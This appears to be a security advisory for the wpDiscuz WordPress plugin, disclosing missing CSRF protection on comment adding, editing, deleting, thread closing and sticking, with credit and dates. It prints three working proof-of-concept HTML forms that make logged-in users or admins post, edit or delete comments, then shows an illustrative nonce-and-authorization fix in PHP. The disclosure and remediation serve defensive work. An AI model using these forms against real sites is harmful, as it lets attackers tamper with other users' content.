The plugin does not check for CSRF when adding, editing and deleting comments, which could allow an attacker to make logged-in users such as an admin edit and delete arbitrary comments, or make the user who posted a comment edit it, via a CSRF attack. Attackers could also make logged-in users post arbitrary comments. Other affected actions: wpdCloseThread (to close/open threads) and wpdStickComment (to stick/unstick a comment).
To make the logged in user add a comment:

<html>
  <body>
    <form action="https://example.com/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="wpdAddComment" />
      <input type="hidden" name="wc_comment" value="Comment added via CSRF" />
      <input type="hidden" name="submit" value="Post Comment" />
      <input type="hidden" name="wpdiscuz_unique_id" value="dummy" />
      <input type="hidden" name="postId" value="811" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

To delete a comment (CSRF against an admin):

<html>
  <body>
    <form action="https://example.com/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="wpdDeleteComment" />
      <input type="hidden" name="id" value="27" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

To edit a comment (CSRF against the user who made the comment, or against an admin to modify any comment):

<html>
  <body>
    <form action="https://example.com/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="wpdSaveEditedComment" />
      <input type="hidden" name="commentId" value="6" />
      <input type="hidden" name="wc_comment" value="Attacker CSRF" />
      <input type="hidden" name="postId" value="811" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
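The forms above work because the request carries nothing an attacker's page cannot supply. As an added example (not wpDiscuz's own code or its actual patch), this is how an admin-ajax handler for the wpdSaveEditedComment action can require a WordPress nonce and then check authorization separately. The nonce action name wpd_example_nonce, the nonce field name, the script handle and the example_* function names are hypothetical, and the snippet assumes it is loaded inside a WordPress plugin.

```php
<?php
// Added example, not the plugin's code. Hypothetical names: wpd_example_nonce,
// example-comments, exampleComments, example_save_edited_comment.

// Front end: expose a nonce tied to the current user and session so the
// legitimate script can send it as the "nonce" POST field. Assumes a script
// with the handle "example-comments" is already registered and enqueued.
add_action( 'wp_enqueue_scripts', function () {
    wp_localize_script( 'example-comments', 'exampleComments', array(
        'ajaxUrl' => admin_url( 'admin-ajax.php' ),
        'nonce'   => wp_create_nonce( 'wpd_example_nonce' ),
    ) );
}, 20 );

function example_save_edited_comment() {
    // CSRF check: ends the request with a 403 unless $_POST['nonce'] is a
    // valid nonce for this user and action. A cross-site form cannot read it.
    check_ajax_referer( 'wpd_example_nonce', 'nonce' );

    $comment_id = isset( $_POST['commentId'] ) ? absint( $_POST['commentId'] ) : 0;
    $content    = isset( $_POST['wc_comment'] )
        ? wp_kses_post( wp_unslash( $_POST['wc_comment'] ) )
        : '';
    if ( ! $comment_id || '' === trim( $content ) ) {
        wp_send_json_error( 'invalid_request', 400 );
    }

    // Authorization is a separate question from CSRF: only the comment's
    // author or a user allowed to edit this comment may change it.
    $comment  = get_comment( $comment_id );
    $is_owner = $comment && (int) $comment->user_id === get_current_user_id();
    if ( ! $comment || ( ! $is_owner && ! current_user_can( 'edit_comment', $comment_id ) ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }

    // wp_update_comment() expects slashed input.
    wp_update_comment( array(
        'comment_ID'      => $comment_id,
        'comment_content' => wp_slash( $content ),
    ) );
    wp_send_json_success();
}
// wp_ajax_{action} only fires for logged-in users.
add_action( 'wp_ajax_wpdSaveEditedComment', 'example_save_edited_comment' );
```

The same nonce check applies to every state-changing action named on this page: wpdAddComment, wpdDeleteComment, wpdCloseThread and wpdStickComment.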
Brandon Roldan
Brandon Roldan
Yes
2021-10-11 (about 1 years ago)
2021-10-11 (about 1 years ago)
2022-04-08 (about 1 years ago)